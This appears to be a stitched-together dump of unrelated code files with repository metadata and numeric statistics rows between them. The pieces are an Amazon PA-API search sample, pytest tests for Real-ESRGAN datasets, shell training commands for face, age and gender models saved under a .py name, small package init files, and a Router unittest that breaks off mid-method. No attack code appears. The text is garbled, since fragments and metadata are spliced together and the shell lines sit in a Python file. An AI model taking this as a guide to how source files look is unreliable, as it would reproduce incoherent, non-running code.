    except ValueError as exception:
        print("Error in forming SearchItemsRequest: ", exception)
        return

    try:
        # Sending the request with async_req=True returns a thread-like
        # handle; .get() blocks until the response is available.
        thread = default_api.search_items(search_items_request, async_req=True)
        response = thread.get()
        print("API called Successfully")
        print("Complete Response:", response)

        # Parse the response, guarding every optional attribute against None.
        if response.search_result is not None:
            print("Printing first item information in SearchResult:")
            item_0 = response.search_result.items[0]
            if item_0 is not None:
                if item_0.asin is not None:
                    print("ASIN: ", item_0.asin)
                if item_0.detail_page_url is not None:
                    print("DetailPageURL: ", item_0.detail_page_url)
                info = item_0.item_info
                if info is not None and info.title is not None and info.title.display_value is not None:
                    print("Title: ", item_0.item_info.title.display_value)
                listings = item_0.offers.listings if item_0.offers is not None else None
                if (listings is not None
                        and listings[0].price is not None
                        and listings[0].price.display_amount is not None):
                    print(
                        "Buying Price: ", item_0.offers.listings[0].price.display_amount
                    )
        if response.errors is not None:
            print("\nPrinting Errors:\nPrinting First Error Object from list of Errors")
            print("Error code", response.errors[0].code)
            print("Error message", response.errors[0].message)
    except ApiException as exception:
        print("Error calling PA-API 5.0!")
        print("Status code:", exception.status)
        print("Errors :", exception.body)
        print("Request ID:", exception.headers["x-amzn-RequestId"])
    except TypeError as exception:
        print("TypeError :", exception)
    except ValueError as exception:
        print("ValueError :", exception)
    except Exception as exception:
        print("Exception :", exception)
# Demo entry point: run the synchronous sample on import/execution.
# Uncomment a line below to exercise the http-info or async variant instead.
search_items()
# search_items_with_http_info()
# search_items_async()
| 37.227882
| 148
| 0.620913
| 1,611
| 13,886
| 5.21167
| 0.124146
| 0.026798
| 0.039662
| 0.031682
| 0.88697
| 0.882563
| 0.877323
| 0.84576
| 0.84576
| 0.84576
| 0
| 0.010448
| 0.283163
| 13,886
| 372
| 149
| 37.327957
| 0.833032
| 0.052067
| 0
| 0.844444
| 0
| 0
| 0.139168
| 0.006556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.022222
| 0
| 0.048889
| 0.244444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
609c7eaab2c4113d06e13fec1897cce725812b62
| 101
|
py
|
Python
|
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | 1
|
2021-12-27T17:23:32.000Z
|
2021-12-27T17:23:32.000Z
|
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | null | null | null |
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | null | null | null |
import shekels.core.config
import shekels.core.data_tools
import shekels.core.database # noqa: F401
| 25.25
| 42
| 0.821782
| 15
| 101
| 5.466667
| 0.6
| 0.47561
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032967
| 0.09901
| 101
| 3
| 43
| 33.666667
| 0.868132
| 0.09901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
715b4082645c131d43d728ae8f65bcc2430aa8c9
| 6,037
|
py
|
Python
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 8,944
|
2021-07-22T21:11:06.000Z
|
2022-03-31T22:29:38.000Z
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 239
|
2021-07-23T16:21:32.000Z
|
2022-03-31T12:44:19.000Z
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 1,040
|
2021-07-23T01:10:30.000Z
|
2022-03-31T03:41:08.000Z
|
import pytest
import yaml
from realesrgan.data.realesrgan_dataset import RealESRGANDataset
from realesrgan.data.realesrgan_paired_dataset import RealESRGANPairedDataset
def test_realesrgan_dataset():
    """Smoke-test RealESRGANDataset with both the disk and lmdb IO backends.

    Verifies backend selection, meta-info size, the degradation-kernel
    configuration, and the keys/shapes/paths of indexed samples.
    Relies on the fixture files under tests/data/.
    """
    with open('tests/data/test_realesrgan_dataset.yml', mode='r') as f:
        opt = yaml.load(f, Loader=yaml.FullLoader)

    dataset = RealESRGANDataset(opt)
    assert dataset.io_backend_opt['type'] == 'disk'  # io backend
    assert len(dataset) == 2  # whether correct meta info was read
    assert dataset.kernel_list == [
        'iso', 'aniso', 'generalized_iso', 'generalized_aniso', 'plateau_iso', 'plateau_aniso'
    ]  # correct initialization of the degradation configurations
    assert dataset.betag_range2 == [0.5, 4]

    # test __getitem__ (idiomatic indexing instead of calling the dunder)
    result = dataset[0]
    # check returned keys
    expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
    assert set(expected_keys).issubset(set(result.keys()))
    # check shape and contents
    assert result['gt'].shape == (3, 400, 400)
    assert result['kernel1'].shape == (21, 21)
    assert result['kernel2'].shape == (21, 21)
    assert result['sinc_kernel'].shape == (21, 21)
    assert result['gt_path'] == 'tests/data/gt/baboon.png'

    # ------------------ test lmdb backend -------------------- #
    opt['dataroot_gt'] = 'tests/data/gt.lmdb'
    opt['io_backend']['type'] = 'lmdb'
    dataset = RealESRGANDataset(opt)
    assert dataset.io_backend_opt['type'] == 'lmdb'  # io backend
    # NOTE(review): this section checks len(dataset.paths) while the disk
    # section checks len(dataset) -- presumably equivalent; confirm.
    assert len(dataset.paths) == 2  # whether correct meta info was read
    assert dataset.kernel_list == [
        'iso', 'aniso', 'generalized_iso', 'generalized_aniso', 'plateau_iso', 'plateau_aniso'
    ]  # correct initialization of the degradation configurations
    assert dataset.betag_range2 == [0.5, 4]

    # test __getitem__
    result = dataset[1]
    # check returned keys
    expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
    assert set(expected_keys).issubset(set(result.keys()))
    # check shape and contents
    assert result['gt'].shape == (3, 400, 400)
    assert result['kernel1'].shape == (21, 21)
    assert result['kernel2'].shape == (21, 21)
    assert result['sinc_kernel'].shape == (21, 21)
    assert result['gt_path'] == 'comic'

    # ------------------ test with sinc_prob = 0 -------------------- #
    opt['dataroot_gt'] = 'tests/data/gt.lmdb'
    opt['io_backend']['type'] = 'lmdb'
    opt['sinc_prob'] = 0
    opt['sinc_prob2'] = 0
    opt['final_sinc_prob'] = 0
    dataset = RealESRGANDataset(opt)
    result = dataset[0]
    # check returned keys
    expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
    assert set(expected_keys).issubset(set(result.keys()))
    # check shape and contents
    assert result['gt'].shape == (3, 400, 400)
    assert result['kernel1'].shape == (21, 21)
    assert result['kernel2'].shape == (21, 21)
    assert result['sinc_kernel'].shape == (21, 21)
    assert result['gt_path'] == 'baboon'

    # ------------------ lmdb backend should have paths ending with .lmdb -------------------- #
    with pytest.raises(ValueError):
        opt['dataroot_gt'] = 'tests/data/gt'
        opt['io_backend']['type'] = 'lmdb'
        dataset = RealESRGANDataset(opt)
def test_realesrgan_paired_dataset():
    """Smoke-test RealESRGANPairedDataset with disk, lmdb and folder-scan backends.

    For every backend we check the io backend type, the dataset length read
    from the meta info, and the keys/shapes of one __getitem__ sample.
    """

    def _assert_sample(sample, gt_path=None, lq_path=None):
        # Shared key/shape checks for a single sample; path values are only
        # asserted when the caller supplies them.
        for key in ('gt', 'lq', 'gt_path', 'lq_path'):
            assert key in sample.keys()
        assert sample['gt'].shape == (3, 128, 128)
        assert sample['lq'].shape == (3, 32, 32)
        if gt_path is not None:
            assert sample['gt_path'] == gt_path
        if lq_path is not None:
            assert sample['lq_path'] == lq_path

    with open('tests/data/test_realesrgan_paired_dataset.yml', mode='r') as f:
        opt = yaml.load(f, Loader=yaml.FullLoader)

    # ------------------ disk backend with meta-info file ------------------ #
    dataset = RealESRGANPairedDataset(opt)
    assert dataset.io_backend_opt['type'] == 'disk'  # io backend
    assert len(dataset) == 2  # whether to read correct meta info
    _assert_sample(
        dataset[0],
        gt_path='tests/data/gt/baboon.png',
        lq_path='tests/data/lq/baboon.png')

    # ------------------ lmdb backend ------------------ #
    opt['dataroot_gt'] = 'tests/data/gt.lmdb'
    opt['dataroot_lq'] = 'tests/data/lq.lmdb'
    opt['io_backend']['type'] = 'lmdb'
    dataset = RealESRGANPairedDataset(opt)
    assert dataset.io_backend_opt['type'] == 'lmdb'  # io backend
    assert len(dataset) == 2  # whether to read correct meta info
    _assert_sample(dataset[1], gt_path='comic', lq_path='comic')

    # ------------------ paired_paths_from_folder (no meta info) ------------------ #
    opt['dataroot_gt'] = 'tests/data/gt'
    opt['dataroot_lq'] = 'tests/data/lq'
    opt['io_backend'] = dict(type='disk')
    opt['meta_info'] = None
    dataset = RealESRGANPairedDataset(opt)
    assert dataset.io_backend_opt['type'] == 'disk'  # io backend
    assert len(dataset) == 2  # whether to read correct meta info
    _assert_sample(dataset[0])

    # ------------------ normalization branch ------------------ #
    dataset.mean = [0.5, 0.5, 0.5]
    dataset.std = [0.5, 0.5, 0.5]
    _assert_sample(dataset[0])
| 39.717105
| 94
| 0.625642
| 756
| 6,037
| 4.80291
| 0.125661
| 0.089232
| 0.046268
| 0.03718
| 0.859267
| 0.856513
| 0.841641
| 0.800055
| 0.787111
| 0.75902
| 0
| 0.031493
| 0.189995
| 6,037
| 151
| 95
| 39.980132
| 0.711043
| 0.190492
| 0
| 0.764706
| 0
| 0
| 0.203015
| 0.032012
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.019608
| false
| 0
| 0.039216
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7161e65dbae03899950e09cae96b95481cf8bd16
| 11,448
|
py
|
Python
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 25
|
2019-03-28T09:02:44.000Z
|
2022-02-11T15:30:50.000Z
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 2
|
2020-10-29T06:16:16.000Z
|
2021-01-04T02:23:04.000Z
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 7
|
2020-03-26T05:39:30.000Z
|
2021-07-30T09:12:42.000Z
|
# Preprocessing dataset
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/train/age \
~/fevemania/datasets/age/test_fold_is_4/train \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/train/gender \
~/fevemania/datasets/gender/test_fold_is_4/train \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=2 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/validation/age \
~/fevemania/datasets/age/test_fold_is_4/val \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/validation/gender \
~/fevemania/datasets/gender/test_fold_is_4/val \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/validation.py \
--data_dir '~/fevemania/datasets/facenet' \
--model 'official_checkpoint/emotion/1/copied' \
--use_fixed_image_standardization \
--task_name emotion \
--task_id 2 \
--eval_once \
--print_mem \
--print_mask_info \
# step1 : Transfer official checkpoint into the one that has our self-defined variables
# i.e. masks and their thresholds, and change weights' names in checkpoint file (from '' to 'task_1')
#
# In the meanwhile, add hole for task_1
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/facenet/5 \
--models_base_dir official_checkpoint/facenet/5 \
--data_dir /home/ivclab/fevemania/datasets/vggface2 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/datasets/lfw_mtcnnpy_160/ \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.4 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--lfw_distance_metric 1 \
--lfw_use_flipped_images \
--lfw_subtract_mean \
--validation_set_split_ratio 0.05 \
--validate_every_n_epochs 5 \
--prelogits_norm_loss_factor 5e-4 \
--gpu_memory_fraction 0.8 \
--change_weight_name_from_github official_checkpoint/model-20180402-114759.ckpt-275 \
--open_ratio 1.0 \
--task_id 1 \
# step2 : use csv file to record the initial accuracy and its pruned status (pruned_ratio = 0.0)
CUDA_VISIBLE_DEVICES=1 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--model official_checkpoint/facenet/5/model-.ckpt-0 \
--eval_once \
# --print_mem \
# --print_mask_info \
# --verbose \
# --csv_file_path csv/facenet.csv \
# step3 : gradually pruning (each time prune 10%)
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/facenet \
--models_base_dir official_checkpoint/facenet \
--data_dir /home/ivclab/fevemania/datasets/vggface2/train_182 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/datasets/lfw_mtcnnpy_160/ \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 4 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--lfw_distance_metric 1 \
--lfw_use_flipped_images \
--lfw_subtract_mean \
--validation_set_split_ratio 0.05 \
--validate_every_n_epochs 1000 \
--prelogits_norm_loss_factor 5e-4 \
--gpu_memory_fraction 0.8 \
--use_pruning_strategy \
--begin_pruning_epoch 0 \
--end_pruning_epoch 1.0 \
--pruning_hparams name=pruning,initial_sparsity=0.0,target_sparsity=0.1,pruning_frequency=10 \
# Step 4. second task (age) -> open new hole
CUDA_VISIBLE_DEVICES=2 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.01 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--pretrained_model official_checkpoint/facenet/model-.ckpt-8 \
--task_name age \
--task_id 2 \
--open_ratio 1.0 \
# Step 5. check if the past task is forgotten by the network
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/age/model-.ckpt-52 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 300 \
--eval_once \
--print_mem \
--print_mask_info \
# Step 6. start training age (task2)
CUDA_VISIBLE_DEVICES=2 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.001 \
--nrof_addiitonal_epochs_to_run 60 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name age \
--task_id 2 \
--max_to_keep 10
# Step 7. evaluate task2
CUDA_VISIBLE_DEVICES=1 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/age/model-.ckpt-85 \
--use_fixed_image_standardization \
--task_id 2 \
--print_mem \
--print_mask_info \
--verbose \
--csv_file_path csv/age.csv \
--eval_once \
# Step 8. pruning task2
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 85 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name age \
--task_id 2 \
--max_to_keep 10 \
--use_pruning_strategy \
--begin_pruning_epoch 0 \
--end_pruning_epoch 1.0 \
--pruning_hparams name=pruning,initial_sparsity=0.8,target_sparsity=0.85,pruning_frequency=10 \
# Step 9. open hole for task3
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/gender \
--models_base_dir official_checkpoint/gender \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.01 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--pretrained_model official_checkpoint/age/model-.ckpt-72 \
--task_name gender \
--task_id 3 \
--set_zeros_in_masks_to_current_task_id \
--open_ratio 1.0 \
# Step 10. check if the past task is forgotten by the network
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/gender/model-.ckpt-0 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 300 \
--eval_once \
--print_mem \
--print_mask_info \
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/gender/model-.ckpt-15 \
--use_fixed_image_standardization \
--task_id 2 \
--task_name age \
--eval_once \
--print_mem \
--print_mask_info \
CUDA_VISIBLE_DEVICES=1 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender/others/test_fold_is_4 \
--model official_checkpoint/gender/copied/model-.ckpt-15 \
--use_fixed_image_standardization \
--task_id 2 \
--task_name age \
--eval_once \
--print_mem \
--print_mask_info \
# Step 11. start training gender (task3)
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/gender \
--models_base_dir official_checkpoint/gender \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 35 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name gender \
--task_id 3 \
--max_to_keep 5
# Step 12. evaluate task 3
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/gender/model-.ckpt-28 \
--use_fixed_image_standardization \
--task_id 3 \
--eval_once \
--task_name gender \
--print_mem \
--print_mask_info \
--csv_file_path csv/gender.csv \
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/careful_pruning_05 \
--lfw_pairs data/custom_pairs.txt \
--lfw_nrof_folds 2 \
--distance_metric 1 \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 1 \
--eval_once \
# --use_flipped_images \
# CUDA_VISIBLE_DEVICES=1 python src/train_softmax.py \
# --logs_base_dir logs/facenet/ \
# --models_base_dir official_checkpoint \
# --data_dir ~/fevemania/datasets/CASIA-WebFacealignmtcnn112/ \
# --image_size 160 \
# --model_def models.inception_resnet_v1 \
# --lfw_dir ~/datasets/lfw/lfw_mtcnnalign_160/ \
# --optimizer ADAM \
# --learning_rate -1 \
# --nrof_addiitonal_epochs_to_run 150 \
# --keep_probability 0.8 \
# --random_crop \
# --random_flip \
# --use_fixed_image_standardization \
# --learning_rate_schedule_file data/learning_rate_schedule_classifier_casia.txt \
# --weight_decay 5e-4 \
# --embedding_size 512 \
# --lfw_distance_metric 1 \
# --lfw_use_flipped_images \
# --lfw_subtract_mean \
# --validation_set_split_ratio 0.05 \
# --validate_every_n_epochs 5 \
# --prelogits_norm_loss_factor 5e-4
tf.get_default_graph().get_tensor_by_name("task_1/Logits/BiasAdd:0")
python src/validate_on_lfw.py \
~/datasets/lfw_mtcnnpy_160 \
original \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization
CUDA_VISIBLE_DEVICES=1 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir '/home/ivclab/fevemania/datasets/age/test_fold_is_4' \
--use_fixed_image_standardization \
--task_name age \
--task_id 2 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
CUDA_VISIBLE_DEVICES=3 python src/validation.py \
--data_dir '/home/ivclab/fevemania/datasets/gender/test_fold_is_4' \
--use_fixed_image_standardization \
--task_name gender \
--task_id 3 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
| 29.353846
| 100
| 0.77376
| 1,735
| 11,448
| 4.727378
| 0.127954
| 0.058035
| 0.05267
| 0.07169
| 0.85662
| 0.843331
| 0.810778
| 0.788344
| 0.772616
| 0.768227
| 0
| 0.039938
| 0.098882
| 11,448
| 390
| 101
| 29.353846
| 0.755138
| 0.138539
| 0
| 0.815534
| 0
| 0
| 0.019352
| 0.019352
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.055016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71723dd614682a121a712c7f69103fd8789aecbb
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# Auto-generated placeholder names — presumably fixture data for an IDE
# star-import completion test (see the deeply nested package path); the exact
# names are likely significant to that test, so do not rename — TODO confirm.
name1_1_1_1_0_2_0 = None
name1_1_1_1_0_2_1 = None
name1_1_1_1_0_2_2 = None
name1_1_1_1_0_2_3 = None
name1_1_1_1_0_2_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.266667
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e0807c613172e62bb48c624efcd006f15d3c2fa6
| 157
|
py
|
Python
|
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""hmtl package root.

Flattens the public names of all subpackages into the top-level ``hmtl``
namespace via star imports, so callers can write ``hmtl.X`` regardless of
which subpackage defines ``X``.
"""
from hmtl.dataset_readers import *
from hmtl.modules import *
from hmtl.models import *
from hmtl.tasks import *
from hmtl.training import *
| 22.428571
| 34
| 0.770701
| 24
| 157
| 5
| 0.5
| 0.333333
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.146497
| 157
| 7
| 35
| 22.428571
| 0.88806
| 0.082803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0a7c1a223cdbc8d81d9807dc0c32b046c5145b2
| 6,992
|
py
|
Python
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | 3
|
2020-02-04T10:33:45.000Z
|
2020-02-04T10:34:27.000Z
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | 9
|
2018-04-09T14:45:20.000Z
|
2018-04-16T04:15:31.000Z
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | null | null | null |
import unittest
from src.serve import Router
# Banner emitted at import time so the router test run is easy to spot in logs.
print('\n***ROUTER TEST***\n')
def middleware_1(req, res, next):
    # Middleware stub: does nothing and does not call next().
    pass
def middleware_2(req, res, next):
    # Middleware stub: immediately passes control to the next handler.
    next()
def endware_1(req, res):
    # Endware stub used as a registration target; identity is what the
    # tests assert on, not behavior.
    pass
def endware_2(req, res):
    # Second endware stub so tests can distinguish which handler matched.
    pass
class TestRouter(unittest.TestCase):
    """Unit tests for Router middleware/endware registration and path matching."""

    def test_init(self):
        """A freshly constructed Router is a usable object."""
        router = Router()
        self.assertIsNotNone(router)

    def test_all(self):
        """Routes registered via all() match every HTTP method."""
        router = Router()
        router.all('/', endware_1)
        router.all('/', endware_2)
        for method in ('GET', 'PUT', 'POST', 'DELETE'):
            self.assertIsNotNone(router._endware_path_match('/', method))
        self.assertIsNone(router._endware_path_match('/abc', 'GET'))
        # endware_1 matches method in tuple in endware
        self.assertEqual(router._endware_path_match('/', 'GET')[2], endware_1)

    def _check_single_method(self, method):
        """Shared body for the per-verb tests (GET/POST/PUT/DELETE).

        The original file repeated this block four times verbatim; it
        registers three routes with one verb and checks that only that verb
        matches, that the right endware is returned, and that path params
        and query strings are parsed.
        """
        router = Router()
